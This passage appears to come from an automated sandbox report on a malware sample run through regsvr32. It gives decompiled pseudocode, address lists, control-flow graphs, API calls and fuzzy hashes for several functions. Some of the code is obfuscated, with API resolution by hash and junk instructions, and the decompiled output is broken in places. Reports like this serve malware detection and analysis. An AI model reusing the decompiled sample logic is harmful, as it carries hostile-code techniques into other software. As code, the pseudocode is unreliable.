							_t60 = _t91 - 1;
							if( *((char*)(_t103 + _t106)) != 0x3d) {
								goto L12;
							}
							_t52 = _t60;
							if(_t60 != 0) {
								continue;
							}
							goto L12;
						}
						goto L12;
					}
				}
			}





























                                0x0073a238
                                0x0073a238
                                0x0073a23b
                                0x0073a23f
                                0x0073a244
                                0x0073a245
                                0x0073a252
                                0x0073a25c
                                0x0073a260
                                0x0073a265
                                0x0073a268
                                0x0073a26d
                                0x0073a278
                                0x0073a3dc
                                0x0073a3f5
                                0x0073a3f5
                                0x0073a288
                                0x0073a290
                                0x0073a29f
                                0x0073a2a1
                                0x0073a292
                                0x0073a299
                                0x0073a299
                                0x0073a2b1
                                0x0073a2b1
                                0x0073a2b6
                                0x0073a2bc
                                0x0073a2bf
                                0x0073a2c7
                                0x0073a3ce
                                0x0073a3d6
                                0x00000000
                                0x0073a2cd
                                0x0073a2cd
                                0x0073a2dd
                                0x0073a2e2
                                0x0073a2e2
                                0x0073a2ed
                                0x0073a2fc
                                0x0073a304
                                0x0073a30d
                                0x0073a30d
                                0x0073a306
                                0x0073a309
                                0x0073a309
                                0x0073a30f
                                0x0073a317
                                0x0073a31c
                                0x0073a31f
                                0x0073a32a
                                0x0073a32f
                                0x0073a337
                                0x0073a339
                                0x0073a341
                                0x00000000
                                0x0073a347
                                0x0073a347
                                0x0073a34f
                                0x0073a354
                                0x0073a354
                                0x0073a359
                                0x0073a35e
                                0x0073a361
                                0x0073a366
                                0x0073a36b
                                0x0073a36f
                                0x0073a374
                                0x0073a378
                                0x0073a389
                                0x0073a38b
                                0x0073a391
                                0x0073a396
                                0x0073a39e
                                0x0073a3ad
                                0x0073a3a0
                                0x0073a3a0
                                0x0073a3a0
                                0x0073a3a0
                                0x0073a39e
                                0x0073a3b8
                                0x0073a3c8
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x0073a37a
                                0x0073a37a
                                0x0073a37a
                                0x0073a381
                                0x00000000
                                0x00000000
                                0x0073a383
                                0x0073a387
                                0x00000000
                                0x00000000
                                0x00000000
                                0x0073a387
                                0x00000000
                                0x0073a37a
                                0x0073a341

                                APIs
                                  • Part of subcall function 007324B0: HeapAlloc.KERNEL32 ref: 00732572
                                  • Part of subcall function 007324B0: HeapFree.KERNEL32 ref: 007325A9
                                  • Part of subcall function 007324B0: HeapFree.KERNEL32 ref: 007325B7
                                  • Part of subcall function 0073908C: SetLastError.KERNEL32 ref: 007390C8
                                • HeapAlloc.KERNEL32 ref: 0073A2B6
                                • HeapFree.KERNEL32 ref: 0073A339
                                • HeapFree.KERNEL32 ref: 0073A3B8
                                • HeapFree.KERNEL32 ref: 0073A3C8
                                • HeapFree.KERNEL32 ref: 0073A3D6
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: Heap$Free$Alloc$ErrorLast
                                • String ID:
                                • API String ID: 1659099196-0
                                • Opcode ID: ebec7e3ced01d3e53c95a68bcdc967b9fa3e31920521932be2b83d349f2b3dc9
                                • Instruction ID: 4981db4443c45dff49b96d5be61638d8b411d84e5456f2ddc4787e3a3e33d027
                                • Opcode Fuzzy Hash: ebec7e3ced01d3e53c95a68bcdc967b9fa3e31920521932be2b83d349f2b3dc9
                                • Instruction Fuzzy Hash: 6E418132709B859AFB59DB56A84476AB7A1FBC9BC4F048025AE8E43706EF3CD505C701
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00732DC4 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 192memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 494 732dc4-732e1a call 734320 497 732e29-732e2e 494->497 498 732e1c-732e27 494->498 499 732e34-732e50 call 734880 497->499 498->499 502 732e56-732e6c 499->502 503 732f94-732f9a 499->503 506 732e6e-732e88 502->506 507 732e8d-732ece call 731bfc 502->507 504 732fc2 503->504 505 732f9c-732faa call 7347b8 503->505 510 732fc7 504->510 516 732faf-732fb1 505->516 506->507 511 732ed3-732ee8 HeapFree 507->511 513 732fcd-732fd1 510->513 514 732f01-732f03 511->514 515 732eea-732eec 511->515 517 732fd3-732fe4 call 73908c 513->517 518 73302f-733032 513->518 514->503 522 732f09-732f46 call 736c1c call 737b6c 514->522 519 732ef6-732efc call 73a3f8 515->519 520 732eee-732ef4 515->520 516->513 521 732fb3-732fc0 516->521 533 732fe6 517->533 534 732fed-732ff0 517->534 523 733034-733044 HeapFree 518->523 524 73308e-7330a0 518->524 519->514 520->514 520->519 521->513 545 732f71-732f92 HeapFree call 7347b8 522->545 546 732f48-732f6d 522->546 528 733046-73304c 523->528 529 73304e-73305f call 73908c 523->529 528->524 528->529 541 733061 529->541 542 733067-733086 call 73908c 529->542 533->534 535 732ff2-732ffb 534->535 536 73301c-73302b 534->536 535->536 539 732ffd-73300d call 7347b8 535->539 536->518 539->536 553 73300f-733017 539->553 541->542 542->524 552 733088 542->552 545->516 546->513 550 732f6f 546->550 550->510 552->524 553->536
                                C-Code - Quality: 32%
                                			E00732DC4(void* __ebx, void* __edx, void* __ebp, void* __rcx, long long __rdx, long long __r8, void* __r9, signed int _a8, signed long long _a16, signed int* _a24, signed int _a32) {
				intOrPtr _v88;
				void* _v96;
				signed int _v104;
				signed long long _v112;
				signed int _v120;
				long long _v128;
				signed long long _v136;
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t71;
				void* _t82;
				void* _t87;
				signed int _t89;
				void* _t90;
				signed int _t94;
				void* _t95;
				void* _t96;
				signed int _t97;
				void* _t113;
				signed long long _t134;
				void* _t137;
				void* _t164;
				signed int _t166;
				void* _t168;
				void* _t170;
				void* _t182;
				void* _t183;
				signed int* _t187;
				signed int _t188;
				signed long long _t194;

				_t113 = __ebp;
				_t95 = __ebx;
				_t183 = _t170;
				 *((long long*)(_t183 + 0x18)) = __r8;
				 *((long long*)(_t183 + 0x10)) = __rdx;
				_push(_t137);
				_push(_t168);
				_push(_t166);
				_push(_t194);
				_t192 =  *0x73d458;
				 *(_t183 + 0x20) =  *(_t183 + 0x20) & 0x00000000;
				_t164 = __rcx;
				_t98 =  *0x73d450;
				_t134 =  *((intOrPtr*)( *0x73d458 + 8));
				_v120 =  *0x73d450;
				r15d = 0;
				 *(_t183 - 0x60) =  *(_t183 - 0x60) & _t194;
				_v112 = _t134;
				if(E00734320( *0x73d450, _t137, __rcx, _t183 - 0x68, __rcx, _t166, _t183 + 8, __r9) == 0) {
					_t166 = _v104;
					r12d = 2;
				} else {
					_t12 = _t194 + 1; // 0x1
					r12d = _t12;
					_v104 = _t166;
				}
				_t15 =  &_a32; // 0xca
				_t181 = _t15;
				_t175 =  &_v96;
				_t71 = E00734880(_t95, r12d, _t113, _t134, _t137, _t164,  &_v96, _t15);
				_t96 = _t71;
				if(_t71 != 0) {
					L15:
					if(_t96 == 0x10d2) {
						goto L20;
					}
					_t48 = _t164 + 0xc0; // 0xc0
					_t82 = E007347B8(_t96, _t98, _t134, _t137, _t48, _t168);
					goto L17;
				} else {
					r8d = _a32;
					r13d = r8d;
					r13d = r13d - r12d;
					_t187 = _v96;
					if(_t166 != 0) {
						_t94 = _a8;
						_t187[0xa] = 1;
						_t187[0x12] = _t166;
						_t187[0xd] = _t94;
						_t187[0x10] = _t94;
					}
					_t25 = _t164 + 0xc0; // 0xc0
					r9d = 0;
					 *_t187 = _v120 ^ 0x62ade362;
					_t187[3] =  *(_t164 + 0x48);
					_t187[2] =  *(_t164 + 0x4c);
					_t30 =  &_a8; // 0xb2
					_v128 = _t30;
					_t32 =  &_v120; // 0x32
					_t134 = _t32;
					_v136 = _t134;
					_t87 = E00731BFC(_t98, _t134, _t137, _t25, _t187, _t175, _t181, _t183); // executed
					_t96 = _t87;
					HeapFree(??, ??, ??);
					if(r13d != 0 && (_t96 == 0 || _t96 == 0x10d2)) {
						E0073A3F8(r13d, _t134, _t137, _t164, _t166, _t168);
					}
					if(_t96 != 0) {
						goto L15;
					}
					_t97 = _a8;
					_t188 = _v120;
					r13d =  *(_t164 + 0x4c);
					_t89 = E00736C1C(_t97, _t188);
					_t38 =  &_a8; // 0xb2
					r9d = 1;
					 *(_t164 + 0x48) = _t97;
					 *(_t164 + 0x4c) = _t89;
					_t90 = E00737B6C(_t97, _t98, _t137, _t164, _t188, _t166, _t168, _t38, _t182, _t183);
					_t96 = _t90;
					if(_t90 != 0) {
						HeapFree();
						_t47 = _t164 + 0xc0; // 0xc0
						_t82 = E007347B8(_t96, _t98, _t134, _t137, _t47, _t168);
						L17:
						if(_t82 == 0) {
							asm("lock or dword [edi+0xec], 0x1");
							_t166 = _v104;
						}
						L21:
						if( *((intOrPtr*)(_t164 + 0x60)) != 0) {
							E0073908C(0x9c66d81c, _t134,  *((intOrPtr*)(_t192 + 0x18)));
							if(_t134 != 0) {
								 *_t134();
							}
							if(r15d != 0) {
								_t134 =  *(_t164 + 0x58);
								if(_v88 > _t134) {
									_t57 = _t164 + 0xc0; // 0xc1
									if(E007347B8(_t96, _t98, _t134, _t137, _t57, _t168) == 0) {
										asm("lock or dword [edi+0xec], 0x1");
										_t166 = _v104;
									}
								}
							}
							_t134 = _t134 * 0x23c34600 + _v88;
							 *(_t164 + 0x58) = _t134;
						}
						if(_t166 != 0) {
							HeapFree();
							if(_t96 == 0 || _t96 == 0x10d2) {
								E0073908C(0x4a75e5e7, _t134,  *((intOrPtr*)(_t192 + 0x10)));
								if(_t134 != 0) {
									 *_t134();
								}
								 *(_t164 + 0x98) =  *(_t164 + 0x98) & 0x00000000;
								 *(_t164 + 0x9c) =  *(_t164 + 0x9c) & 0x00000000;
								E0073908C(0x8d72aad2, _t134,  *((intOrPtr*)(_t192 + 0x10)));
								if(_t134 != 0) {
									 *_t134();
								}
							}
						}
						return _t96;
					}
					_t134 = _a16;
					 *_t134 = _t188;
					 *_a24 = _a8;
					if( *(_t164 + 0x4c) != r13d) {
						goto L21;
					}
					L20:
					r15d = 1;
					goto L21;
				}
			}



































                                0x00732dc4
                                0x00732dc4
                                0x00732dc4
                                0x00732dc7
                                0x00732dcb
                                0x00732dcf
                                0x00732dd0
                                0x00732dd1
                                0x00732dd9
                                0x00732ddf
                                0x00732de6
                                0x00732deb
                                0x00732dee
                                0x00732df4
                                0x00732dfc
                                0x00732e04
                                0x00732e07
                                0x00732e0e
                                0x00732e1a
                                0x00732e29
                                0x00732e2e
                                0x00732e1c
                                0x00732e1e
                                0x00732e1e
                                0x00732e22
                                0x00732e22
                                0x00732e34
                                0x00732e34
                                0x00732e3c
                                0x00732e47
                                0x00732e4c
                                0x00732e50
                                0x00732f94
                                0x00732f9a
                                0x00000000
                                0x00732fc2
                                0x00732f9c
                                0x00732fa5
                                0x00000000
                                0x00732e56
                                0x00732e56
                                0x00732e5e
                                0x00732e61
                                0x00732e64
                                0x00732e6c
                                0x00732e6e
                                0x00732e75
                                0x00732e7e
                                0x00732e83
                                0x00732e88
                                0x00732e88
                                0x00732e91
                                0x00732e98
                                0x00732ea3
                                0x00732eaa
                                0x00732eb2
                                0x00732eb7
                                0x00732ebf
                                0x00732ec4
                                0x00732ec4
                                0x00732ec9
                                0x00732ece
                                0x00732edd
                                0x00732edf
                                0x00732ee8
                                0x00732efc
                                0x00732efc
                                0x00732f03
                                0x00000000
                                0x00000000
                                0x00732f09
                                0x00732f10
                                0x00732f15
                                0x00732f1e
                                0x00732f23
                                0x00732f2b
                                0x00732f37
                                0x00732f3a
                                0x00732f3d
                                0x00732f42
                                0x00732f46
                                0x00732f7e
                                0x00732f84
                                0x00732f8d
                                0x00732faf
                                0x00732fb1
                                0x00732fb3
                                0x00732fbb
                                0x00732fbb
                                0x00732fcd
                                0x00732fd1
                                0x00732fdc
                                0x00732fe4
                                0x00732feb
                                0x00732feb
                                0x00732ff0
                                0x00732ff2
                                0x00732ffb
                                0x00732ffd
                                0x0073300d
                                0x0073300f
                                0x00733017
                                0x00733017
                                0x0073300d
                                0x00732ffb
                                0x00733026
                                0x0073302b
                                0x0073302b
                                0x00733032
                                0x0073303c
                                0x00733044
                                0x00733057
                                0x0073305f
                                0x00733065
                                0x00733065
                                0x00733067
                                0x0073306e
                                0x0073307e
                                0x00733086
                                0x0073308c
                                0x0073308c
                                0x00733086
                                0x00733044
                                0x007330a0
                                0x007330a0
                                0x00732f48
                                0x00732f58
                                0x00732f67
                                0x00732f6d
                                0x00000000
                                0x00000000
                                0x00732fc7
                                0x00732fc7
                                0x00000000
                                0x00732fc7

                                APIs
                                  • Part of subcall function 00734320: HeapAlloc.KERNEL32 ref: 00734381
                                • HeapFree.KERNEL32 ref: 00732EDF
                                • HeapFree.KERNEL32 ref: 00732F7E
                                • HeapFree.KERNEL32 ref: 0073303C
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: Heap$Free$Alloc
                                • String ID: uJ
                                • API String ID: 3901518246-2850656762
                                • Opcode ID: e0b0127afc2e475f9b0db1383f047a2d59cc43cd89f7ddf17b2878a33f882b21
                                • Instruction ID: d1e8ee5a8e2d5df2107bf18b2760293ac0e9f599405a1bc497db24dd6abd22c0
                                • Opcode Fuzzy Hash: e0b0127afc2e475f9b0db1383f047a2d59cc43cd89f7ddf17b2878a33f882b21
                                • Instruction Fuzzy Hash: C271AE72704B81D7EB28DB22E548B9AB3A5F788B84F404025EF4947B16DF3DD966CB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130E2A70 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 159memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 46%
                                			E00007FFC7FFC130E2A70(long long __rbx, void* __rcx, long long __rdx, void* __r8, void* __r10) {
				void* __r13;
				void* __r14;
				void* __r15;
				intOrPtr _t74;
				void* _t77;
				void* _t85;
				void* _t98;
				signed long long _t110;
				signed long long _t111;
				signed long long _t113;
				long long _t116;
				void* _t117;
				signed long long _t121;
				long long _t138;
				long long _t142;
				signed long long _t148;
				void* _t149;
				void* _t155;
				signed long long _t157;
				void* _t158;
				void* _t161;
				void* _t163;
				void* _t164;
				void* _t166;
				long long _t168;
				void* _t169;

				r13d =  *(_t158 + 0x100);
				r10d = __r8 - 0x30d5;
				r12d =  *(_t158 + 0x108);
				r8d = __rcx - 0x1408;
				r13d = r13d + 0xffffda68;
				 *(_t158 + 0x100) = r10d;
				_t168 = __rdx;
				 *(_t158 + 0x108) = r8d;
				_t155 = __rcx + 0x61f;
				r9d = r9d + 0xffffeb0d;
				_t138 =  *((intOrPtr*)(_t158 + 0xf0)) + 0xffffd84e;
				 *((intOrPtr*)(_t158 + 0xd0)) = r9d;
				_t148 =  *((intOrPtr*)(_t158 + 0xe8)) + 0x14c1;
				 *((long long*)(_t158 + 0xe8)) = _t138;
				r12d = r12d + 0xffffdc0a;
				r15d = r13d;
				if (_t138 - _t98 >= 0) goto 0x130e2d94;
				if (_t138 - _t98 >= 0) goto 0x130e2d94;
				if (_t155 == _t148 - 0x3f3) goto 0x130e2d94;
				_t74 = _t166 + 0x1f2c;
				 *((long long*)(_t158 + 0xc8)) = __rbx;
				if (r12d - _t74 > 0) goto 0x130e2c16;
				r9d = __r10 + 0x2598;
				_t121 =  *((intOrPtr*)(__rdx + 0x1e0));
				r10d = _t155 - 0x984;
				r11d = _t148 - 0x1956;
				_t116 = _t149 + 0x4ca;
				r8d = _t164 + 0x2103;
				 *((intOrPtr*)(__rdx + 0x68)) = _t74;
				 *(__rdx + 0xa0) = _t121 | 0x00002598;
				 *((long long*)(_t158 + 0x60)) = _t148 - 0x12ab;
				 *(_t158 + 0x58) = r10d;
				 *((intOrPtr*)(_t158 + 0x50)) = r9d;
				 *((intOrPtr*)(_t158 + 0x48)) = r11d;
				 *((long long*)(_t158 + 0x40)) = _t116;
				 *((long long*)(__rdx + 0x1e0)) = _t121 -  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x1c0)) + 0x198)) - 0x3a59;
				 *(_t158 + 0x38) = _t148;
				 *((long long*)(_t158 + 0x30)) =  *(_t158 + 0x100) + 0x38e9;
				 *((long long*)(_t158 + 0x28)) = __rdx;
				 *((long long*)(_t158 + 0x20)) = _t155 + 0xffffeb3f;
				E00007FFC7FFC130FD5F0(_t85, _t148 - 0x12ab,  *((intOrPtr*)(_t158 + 0xe8)) + 0x30d5,  *((intOrPtr*)(_t158 + 0xe0)) + 0x3f3, __r8, _t161, _t163, _t166, __rdx, _t169); // executed
				goto 0x130e2d8c;
				_t142 = r13d;
				_t157 = r12d;
				 *((long long*)(_t158 + 0x70)) = _t142;
				if (_t142 - _t157 *  *(__rdx + 0x198) < 0) goto 0x130e2c95;
				GetProcessHeap();
				_t117 = _t116 + 4;
				if (r13d - _t157 *  *(__rdx + 0x198) >= 0) goto 0x130e2c43;
				r13d = r15d;
				r8d =  *(_t158 + 0x108);
				r9d =  *((intOrPtr*)(_t158 + 0xd0));
				if ( *((intOrPtr*)(__rdx + 0x78)) ==  *((intOrPtr*)(__rdx + 0x1b8)) +  *((intOrPtr*)(__rdx + 0x110)) -  *((intOrPtr*)(__rdx + 0xb0))) goto 0x130e2d8c;
				_t110 = r9d;
				if ( *((intOrPtr*)(_t158 + 0x70)) - ( *(__rdx + 0x1f0) ^  *(__rdx + 0x100)) + _t110 > 0) goto 0x130e2d8c;
				_t77 = _t148 + _t169;
				_t111 = _t110 | _t148;
				if (_t117 - _t111 > 0) goto 0x130e2d8c;
				asm("o16 nop [eax+eax]");
				 *(_t158 + 0x58) = 0x2743;
				_push(_t111);
				asm("loope 0x2f");
				 *_t111 =  *_t111 + _t77;
				asm("dec eax");
				 *_t111 =  *_t111 + _t77;
				r9d = 0x1ff4;
				 *((long long*)(_t158 + 0x40)) = 0x2e2f;
				r8d = 0x1c0c;
				 *(_t158 + 0x38) = 0x26f1;
				 *((long long*)(_t158 + 0x30)) = 0x1000;
				 *((long long*)(_t158 + 0x28)) = 0x1acd;
				 *((long long*)(_t158 + 0x20)) = 0x1f1c;
				 *0x13124160 = E00007FFC7FFC130FF8F0( *((intOrPtr*)(__rdx + 0x78)), __r8 - 0x11a9, _t117 - _t111, 0x103, 0x34b0, __r8 - 0x000011a9 & 0x00003189, _t161, _t163);
				r15d = r15d ^ r13d &  *(_t168 + 0x188);
				_t113 = r8d |  *(_t168 + 0xd8);
				 *(_t168 + 0xb0) = _t113;
				if (_t117 + 3 - (_t113 | _t148) <= 0) goto 0x130e2cf0;
				return _t169 + 0x1f2c;
			}





























                                0x7ffc130e2a83
                                0x7ffc130e2a8b
                                0x7ffc130e2aa0
                                0x7ffc130e2aa8
                                0x7ffc130e2aaf
                                0x7ffc130e2ab6
                                0x7ffc130e2abe
                                0x7ffc130e2ac1
                                0x7ffc130e2ad0
                                0x7ffc130e2ad6
                                0x7ffc130e2add
                                0x7ffc130e2aea
                                0x7ffc130e2af2
                                0x7ffc130e2af8
                                0x7ffc130e2aff
                                0x7ffc130e2b06
                                0x7ffc130e2b0b
                                0x7ffc130e2b1a
                                0x7ffc130e2b28
                                0x7ffc130e2b2e
                                0x7ffc130e2b35
                                0x7ffc130e2b40
                                0x7ffc130e2b4d
                                0x7ffc130e2b54
                                0x7ffc130e2b5b
                                0x7ffc130e2b62
                                0x7ffc130e2b6f
                                0x7ffc130e2b86
                                0x7ffc130e2b94
                                0x7ffc130e2ba1
                                0x7ffc130e2bca
                                0x7ffc130e2bd4
                                0x7ffc130e2bd9
                                0x7ffc130e2bde
                                0x7ffc130e2be3
                                0x7ffc130e2be7
                                0x7ffc130e2bf5
                                0x7ffc130e2bff
                                0x7ffc130e2c03
                                0x7ffc130e2c08
                                0x7ffc130e2c0c
                                0x7ffc130e2c11
                                0x7ffc130e2c16
                                0x7ffc130e2c1c
                                0x7ffc130e2c22
                                0x7ffc130e2c32
                                0x7ffc130e2c61
                                0x7ffc130e2c67
                                0x7ffc130e2c7b
                                0x7ffc130e2c82
                                0x7ffc130e2c85
                                0x7ffc130e2c8d
                                0x7ffc130e2cae
                                0x7ffc130e2cc2
                                0x7ffc130e2ccb
                                0x7ffc130e2cd5
                                0x7ffc130e2cd9
                                0x7ffc130e2cdd
                                0x7ffc130e2ce6
                                0x7ffc130e2cf0
                                0x7ffc130e2d02
                                0x7ffc130e2d03
                                0x7ffc130e2d05
                                0x7ffc130e2d10
                                0x7ffc130e2d13
                                0x7ffc130e2d15
                                0x7ffc130e2d1b
                                0x7ffc130e2d24
                                0x7ffc130e2d2a
                                0x7ffc130e2d33
                                0x7ffc130e2d3c
                                0x7ffc130e2d45
                                0x7ffc130e2d59
                                0x7ffc130e2d6a
                                0x7ffc130e2d70
                                0x7ffc130e2d77
                                0x7ffc130e2d86
                                0x7ffc130e2dad

                                APIs
                                • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFC130E906E), ref: 00007FFC130E2C61
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: HeapProcess
                                • String ID: /.$C'$-
                                • API String ID: 54951025-1702015707
                                • Opcode ID: 672deff062b64fbc16a2a7a10c4d6b86e45e16b49530db53f8233d17ed392130
                                • Instruction ID: ccf3e92e630272ccc681d54ddd9bba27e73fa56e96dc9c7f035c5c5169f8aead
                                • Opcode Fuzzy Hash: 672deff062b64fbc16a2a7a10c4d6b86e45e16b49530db53f8233d17ed392130
                                • Instruction Fuzzy Hash: 4A71BD72A08AD58AE720CB04E494BEEB3A8F78478CF110135DF8917B94DF78E595CB40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F0A40 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FFC130ED8CF), ref: 00007FFC130F0A59
                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FFC130ED8CF), ref: 00007FFC130F0ABB
                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FFC130ED8CF), ref: 00007FFC130F0AF5
                                • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFC130ED8CF), ref: 00007FFC130F0B1F
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                • String ID:
                                • API String ID: 1557788787-0
                                • Opcode ID: ef2e6b779f9dc2e69840adeab8782f97473b4efd568450990a456c347f97633f
                                • Instruction ID: 75863bbc0e5a97b7931cc7ec22bc21650c1f600872e9325186121a1c448551bc
                                • Opcode Fuzzy Hash: ef2e6b779f9dc2e69840adeab8782f97473b4efd568450990a456c347f97633f
                                • Instruction Fuzzy Hash: A1213431F18BA982E620CF11A94002AA6E8BB58BECB184174DE4E73B94DF3CE461C710
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F9F80 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 248pipeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 33%
                                			E00007FFC7FFC130F9F80(void* __ecx, signed int __edx, void* __rax, long long __rbx, long long __rcx, void* __rdx, void* __r8, void* __r9, void* __r10, void* __r11) {
				void* __rdi;
				void* __rbp;
				void* __r12;
				void* _t138;
				void* _t139;
				signed int _t147;
				signed short _t154;
				void* _t159;
				signed int _t171;
				signed int* _t173;
				signed int _t174;
				signed long long _t176;
				signed long long _t177;
				signed int _t179;
				signed int* _t198;
				signed int _t201;
				signed long long _t210;
				signed long long _t232;
				signed int* _t235;
				signed long long _t242;
				CHAR* _t246;
				signed int _t247;
				void* _t253;
				long long _t254;
				void* _t261;
				void* _t262;
				signed int* _t265;
				void* _t274;
				void* _t276;
				void* _t278;
				void* _t280;

				_t268 = __r9;
				 *((long long*)(_t261 + 0x18)) = __rbx;
				 *(_t261 + 0x20) = r9d;
				 *((long long*)(_t261 + 8)) = __rcx;
				_t262 = _t261 - 0x90;
				_t171 =  *(_t262 + 0xf8);
				_t201 = __rdx - 0x3595;
				r12d =  *(_t262 + 0x100);
				r10d = __rdx + 0x354;
				_t198 =  *((intOrPtr*)(_t262 + 0xf0));
				r15d = r9d;
				 *(_t262 + 0x74) = _t201;
				r13d = _t171 - 0x228c;
				 *(_t262 + 0xf8) = __rdx + 0xfffff21d;
				r11d = _t274 + 0x14c1;
				 *((long long*)(_t262 + 0x78)) = _t171 + 0x522;
				r14d = _t280 - 0x12f1;
				_t173 =  *(_t262 + 0x108);
				 *(_t262 + 0x7c) = r11d;
				 *(_t262 + 0x108) = _t235;
				 *(_t262 + 0x80) = r14d;
				r9d = _t173 - 0x11a9;
				r8d = _t173 - 0x923;
				 *(_t262 + 0xd8) = r9d;
				_t174 =  *(_t262 + 0x110);
				 *(_t262 + 0x70) = r8d;
				_t254 = _t174 - 0x11a9;
				_t247 = _t174 + 0x984;
				 *((long long*)(_t262 + 0x84)) = _t254;
				 *(_t262 + 0x110) = _t247;
				if (r14d - _t138 < 0) goto 0x130fa261;
				_t139 = _t278 + 0x1663;
				if (r15d == _t139) goto 0x130fa261;
				_t176 = _t198[0x8f];
				 *_t176 =  *_t176 + _t176;
				 *((intOrPtr*)(_t201 - 0x7f)) =  *((intOrPtr*)(_t201 - 0x7f)) + _t139;
				asm("jmp dword 0x8b48:0x283");
				 *0x343a =  *0x343a;
				 *((intOrPtr*)(_t176 - 0x75)) =  *((intOrPtr*)(_t176 - 0x75)) + __ecx;
				_t177 = _t176 | 0x00000001;
				 *_t177 =  *_t177 + _t139;
				r8d = __edx;
				r9d = 0x329d;
				 *(_t262 + 0x88) = r10d;
				 *(_t262 + 0x50) = 0x13118090;
				 *(_t262 + 0x48) = 0x7d;
				 *(_t262 + 0x40) = 0x1a;
				 *(_t262 + 0x38) =  *((intOrPtr*)(_t177 + 0x130)) - 0x23ef;
				asm("loopne 0x3");
				 *0x13118090 =  *0x13118090 + _t139;
				 *(_t262 + 0x28) = 0x3666;
				 *(_t262 + 0x20) = _t198;
				E00007FFC7FFC130FF290(__ecx, __edx, _t198, _t235, __r8, __r9, _t280, _t278, _t276, _t274, _t235);
				r9d =  *(_t262 + 0xf8);
				r8d =  *(_t262 + 0x110);
				r11d = _t247 - 0x1956;
				r12d =  &(_t235[0x4c2]);
				r10d = _t276 + 0x23f6;
				r14d = _t276 + 0x30d5;
				_t198[0x8f] = 0x13118090;
				_t179 = _t254 + 0x19bd;
				 *(_t262 + 0x68) = _t179;
				 *(_t262 + 0x60) =  &(_t235[0x597]);
				r15d = r15d + 0xfffffbb6;
				 *(_t262 + 0x58) = r10d;
				r9d = r9d + 0xfffffc44;
				 *(_t262 + 0x50) = r11d;
				r8d = r8d + 0xfffff9e1;
				 *(_t262 + 0x48) =  *(_t262 + 0x74) + 0x3189;
				 *(_t262 + 0x40) =  *((intOrPtr*)(_t262 + 0x78)) + 0x9db;
				 *(_t262 + 0x38) = _t254 + 0x1669;
				 *(_t262 + 0x30) = r14d;
				 *(_t262 + 0x28) = _t198;
				 *(_t262 + 0x20) = r15d;
				E00007FFC7FFC130E90B0(_t179, _t198,  &(_t235[0x597]),  *(_t262 + 0xd8) + 0x1b2d, __r8, __r11);
				r14d =  *(_t262 + 0x80);
				r8d =  *(_t262 + 0x74);
				r11d =  *(_t262 + 0x108);
				r8d = r8d + 0x27b2;
				r9d =  *(_t262 + 0x70);
				r11d =  &(r11d[0x4f6]);
				r10d = _t278 + 0x119f;
				 *(_t262 + 0xf8) = _t179;
				r9d = r9d + 0xfffff951;
				 *(_t262 + 0x48) = _t179;
